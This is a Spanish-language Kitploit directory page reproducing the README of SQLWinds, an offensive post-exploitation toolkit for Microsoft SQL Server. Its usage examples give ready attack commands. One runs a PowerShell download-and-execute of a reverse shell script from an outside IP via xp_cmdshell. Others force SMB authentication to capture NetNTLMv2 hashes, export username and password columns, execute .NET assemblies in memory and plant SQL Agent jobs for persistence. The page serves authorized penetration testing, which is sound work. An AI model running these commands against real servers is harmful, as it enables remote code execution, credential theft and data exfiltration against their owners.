Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
sqlwinds — SQLWinds - Evaluación de seguridad de SQL Server y kit de post-explotación | Kitploit
Herramientas/GitHubGitHub/blue0x1/sqlwinds
Escalada de PrivilegiosMecanismos de PersistenciaExplotaciónMovimiento LateralAuditoría de ConfiguraciónExfiltración de DatosPost-ExplotaciónPruebas de PenetraciónRed TeamingSeguridad de Bases de Datos
GitHubblue0x1/sqlwinds
hace 11 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

sqlwinds

SQLWinds - Evaluación de seguridad de SQL Server y kit de post-explotación

Ver Repositorio

SQLWinds

Kit de Evaluación de Seguridad y Post-Explotación para SQL

SQLWinds es una herramienta de línea de comandos para pruebas de seguridad y explotación de Microsoft SQL Server. Proporciona un entorno interactivo para analizar servidores en profundidad, escalar privilegios, ejecutar ataques y pivotar a través de redes, todo con comandos especializados para tareas como ejecución de código en memoria y exploración de bases de datos SCCM.


SQLWinds


📖 Documentación y Recursos

Wiki Issues Releases

Enlaces rápidos:

  • Documentación completa y Wiki - Guía de uso completa y referencia de comandos
  • Reportar un problema - ¿Encontraste un error o tienes una solicitud de función?
  • Última versión - Descarga la versión más reciente

Características

  • Autenticación diversa: Compatible con SQL, Windows integrado (--integrated) y delegación Kerberos (--kerberos con --user/--pass).
  • Enumeración integral:
    • Información del servidor, bases de datos, tablas, columnas, usuarios y permisos.
    • Auditoría de configuración de seguridad (xp_cmdshell, CLR, OLE, etc.).
    • Descubrimiento de datos sensibles y extracción de secretos.
    • Enumeración y explotación de servidores vinculados.
  • Post-explotación y movimiento lateral:
    • Ejecución de código: Habilita y usa xp_cmdshell, Procedimientos de Automatización OLE (sp_oacreate) e integración CLR.
    • CLR en memoria: Carga y ejecuta ensamblados .NET directamente desde la memoria sin escribir archivos en disco (:memclr).
    • Robo de credenciales: Fuerza la autenticación SMB a una ruta UNC para ataques de relay (:unc_smb).
    • Interacción con el registro: Lee claves y valores del registro mediante xp_regread.
    • Persistencia: Crea, lista y ejecuta Trabajos del Agente SQL.

Instalación y compilación

Compilación rápida

El repositorio incluye un script build.bat para compilar fácilmente en Windows:

root@kitploit:~
.\build.bat

El ejecutable compilado SQLWinds.exe se ubicará en el directorio bin\Release\.

Compilación manual

  1. Asegúrate de tener instalado .NET Framework (≥ 4.6.1) o el SDK de .NET.
  2. Clona el repositorio:
    root@kitploit:~
    git clone https://github.com/blue0x1/sqlwinds.git
    cd sqlwinds
    
  3. Compila la solución:
    root@kitploit:~
    msbuild SQLWinds.sln /p:Configuration=Release
    

Uso

Conexión básica

root@kitploit:~
# SQL Authentication
SQLWinds.exe --server TARGET\\INSTANCE --user sa --pass Password123

# Windows Authentication (Current User Context)
SQLWinds.exe --server sql01.corp.local --integrated

# Kerberos Delegation (with provided credentials)
SQLWinds.exe --server sql01.prod.corp.local --kerberos --user CORP\\svc_sql --pass SvcPass123!

# Connect and run a single command
SQLWinds.exe --server 10.0.0.5 --user sa --pass pass --run-cmd "SELECT name FROM sys.databases"

Opciones comunes de línea de comandos

Modo REPL interactivo

root@kitploit:~
sqlwinds> :info
sqlwinds> :dbs
sqlwinds> :users
sqlwinds> :enable_xp_cmdshell
sqlwinds> :xp whoami
sqlwinds> :spn
sqlwinds> help

Referencia completa de comandos REPL

Ejemplo: Uso de :plain para scripts grandes

El comando :plain es esencial para ejecutar scripts SQL grandes de varias líneas.

root@kitploit:~
sqlwinds> :plain
SQL> 
SQL> BEGIN TRY
.....>     SELECT * FROM [VeryImportantTable];
.....>     EXEC sp_configure 'show advanced options', 1;
.....>     RECONFIGURE;
.....> END TRY
.....> BEGIN CATCH
.....>     SELECT ERROR_MESSAGE();
.....> END CATCH
.....> :execute
  1. Escribe :plain y pulsa Enter.
  2. Pega o escribe tu script SQL completo.
  3. En una línea nueva, escribe :execute para ejecutar todo el script o :cancel para cancelar.

Ejemplos

1. Auditoría

root@kitploit:~
SQLWinds.exe --server dc01 --integrated --security-audit 

2. Usar xp_cmdshell para ejecución de código

root@kitploit:~
SQLWinds.exe --server 192.168.1.15 --user sa --pass pass --enable-xp-cmdshell
# In the REPL that opens:
sqlwinds> :xp whoami /all
sqlwinds> :xp powershell -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.15.10/revshell.ps1')"

3. Ejecución CLR en memoria (sin archivos)

root@kitploit:~
# Compile your .NET assembly to a DLL (e.g., CommandExecutor.dll)
sqlwinds> :enable_clr
sqlwinds> :memclr "C:\Tools\CommandExecutor.dll" "CommandExecutor.Class1" "Exec" "whoami"

4. Robo de hashes NetNTLMv2 mediante SRelay

root@kitploit:~
# On your machine: sudo responder -I tun0
sqlwinds> :unc_smb \\10.10.15.10\fake_share

5. Explotación de bases de datos SCCM

root@kitploit:~
SQLWinds.exe --server sccmdb.corp.local --integrated
sqlwinds> :sccm_info
sqlwinds> :sccm_collections
sqlwinds> :sccm_application "Microsoft 365"

6. Exfiltración de datos

root@kitploit:~
# Export sensitive data to CSV
sqlwinds> :exportcsv "SELECT username, password FROM users" credentials.csv

# Download a file stored in the database
sqlwinds> :download "SELECT file_data FROM documents WHERE id=1" secret.docx

🤝 Contribuciones y soporte

¡Agradecemos las contribuciones! Si tienes ideas de mejoras o encuentras cualquier problema:

  1. Consulta la Wiki para documentación
  2. Busca en los Issues existentes para evitar duplicados
  3. Crea un nuevo issue con información detallada sobre tu sugerencia o reporte de error

⚠️ Aviso legal

Esta herramienta está destinada únicamente a pruebas de seguridad autorizadas y fines educativos. El uso no autorizado contra sistemas que no posees o para los que no tienes permiso explícito de prueba es ilegal. Los desarrolladores no asumen ninguna responsabilidad y no son responsables de cualquier uso indebido o daño causado por este programa.


Créditos

Desarrollado por blue0x1.

Descargar herramienta
  • Exfiltración de datos: Sube/descarga archivos y exporta resultados de consultas a CSV/JSON.
  • Interacción con bases de datos SCCM: (Si la base de datos objetivo es SCCM)
    • Detecta SCCM e informa la versión/información del sitio.
    • Inventario de hardware, software, colecciones e implementaciones.
    • Realiza auditorías de seguridad específicas de SCCM.
  • Análisis Kerberos: Comprueba en Active Directory los SPN asociados al objetivo para solucionar problemas de autenticación Kerberos.
  • Descubrimiento de instancias: Enumera las instancias de SQL Server disponibles en el dominio.
  • REPL avanzado: Entorno interactivo con autocompletado e historial de comandos.
  • OpciónDescripción
    --serverServidor objetivo (IP, nombre de host, instancia). Obligatorio.
    --user, --passCredenciales para autenticación SQL o de Windows.
    --integratedUsa el token de Windows actual para autenticarse.
    --kerberosUsa el flujo de autenticación Kerberos.
    --spn-checkComprueba en AD los SPN del host objetivo.
    --run-cmd "<SQL>"Ejecuta un único comando SQL y sal.
    --run-file file.sqlEjecuta un script SQL desde un archivo y sal.
    --infoRecopila y muestra información extensa del servidor.
    --getinstanceDescubre instancias de SQL en el dominio y sal.
    --list-dbsLista las bases de datos y sal.
    --security-auditRealiza una auditoría de seguridad y sal.
    ComandoDescripciónEjemplo
    :infoMuestra información detallada del servidor:info
    :dbsLista todas las bases de datos con detalles:dbs
    :tables [db] [schema]Lista las tablas en la base de datos/esquema:tables master dbo
    :columns <table> [schema] [db]Lista las columnas de una tabla:columns Users dbo MyDatabase
    :usersLista todos los inicios de sesión SQL y usuarios de base de datos:users
    :permsMuestra los permisos del usuario actual:perms
    :auditRealiza una auditoría de configuración de seguridad:audit
    :search [term]Busca datos sensibles:search password
    :secretsExtrae posibles secretos:secrets
    :servicesMuestra las cuentas de servicio de SQL Server:services
    :spnComprueba los SPN del host objetivo:spn
    :enable_xp_cmdshellHabilita xp_cmdshell:enable_xp_cmdshell
    :disable_xp_cmdshellDeshabilita xp_cmdshell:disable_xp_cmdshell
    :xp <command>Ejecuta un comando del sistema operativo mediante xp_cmdshell:xp whoami
    :enable_oleHabilita la Automatización OLE:enable_ole
    :disable_oleDeshabilita la Automatización OLE:disable_ole
    :ole_cmd <command>Ejecuta un comando del sistema operativo mediante OLE:ole_cmd "calc.exe"
    :enable_clrHabilita la integración CLR:enable_clr
    :disable_clrDeshabilita la integración CLR:disable_clr
    :deploy-clr <path>Implementa el ensamblado CLR desde un archivo:deploy-clr C:\Tools\cmd.dll
    :list-assembliesLista los ensamblados CLR implementados:list-assemblies
    :clr_execEjecuta un método CLR:clr_exec MyAssembly MyClass Method arg1
    :memclrEjecuta un ensamblado CLR desde la memoria:memclr "C:\Tools\exec.dll" "Namespace.Class" "Method" "arg"
    :remove-assembly <name>Elimina un ensamblado CLR:remove-assembly MyAssembly
    :list_linkserversLista los servidores vinculados:list_linkservers
    :linkrpc <srv> <cmd>Ejecuta un comando mediante un servidor vinculado:linkrpc LINKEDSRV "whoami"
    :impersonate <login>Suplanta un inicio de sesión SQL:impersonate sa
    :revertRevierte el contexto de seguridad:revert
    :agent_jobGestiona los trabajos del Agente SQL:agent_job create MyJob "whoami"
    :ls [path]Lista el directorio mediante SQL:ls C:\Windows\Temp
    :unc_smb <path>Fuerza la autenticación SMB hacia UNC:unc_smb \\192.168.1.100\share
    :plainPega scripts SQL grandes(Ver ejemplo más abajo)
    :regreadLee un valor del registro:regread HKEY_LOCAL_MACHINE Software\Microsoft value
    :regread_allLista todos los valores de una clave:regread_all HKEY_LOCAL_MACHINE Software\Microsoft
    :uploadSube un archivo a una tabla:upload C:\file.txt MyTable
    :downloadDescarga un binario desde una consulta:download "SELECT file FROM blobs" out.bin
    :exportcsvExporta la consulta a CSV:exportcsv "SELECT * FROM users" out.csv
    :exportjsonExporta la consulta a JSON:exportjson "SELECT * FROM users" out.json
    :sccm_infoDetecta la base de datos SCCM:sccm_info
    :sccm_inventoryMuestra el inventario SCCM:sccm_inventory
    :sccm_collectionsLista las colecciones SCCM:sccm_collections "All Systems"
    :sccm_deploymentsMuestra las implementaciones:sccm_deployments
    :sccm_clientsLista los clientes:sccm_clients inactive
    :sccm_auditAuditoría de seguridad SCCM:sccm_audit
    :sccm_applicationMuestra los detalles de la aplicación:sccm_application "Google Chrome"
    helpMuestra la ayudahelp
    exitSale del REPLexit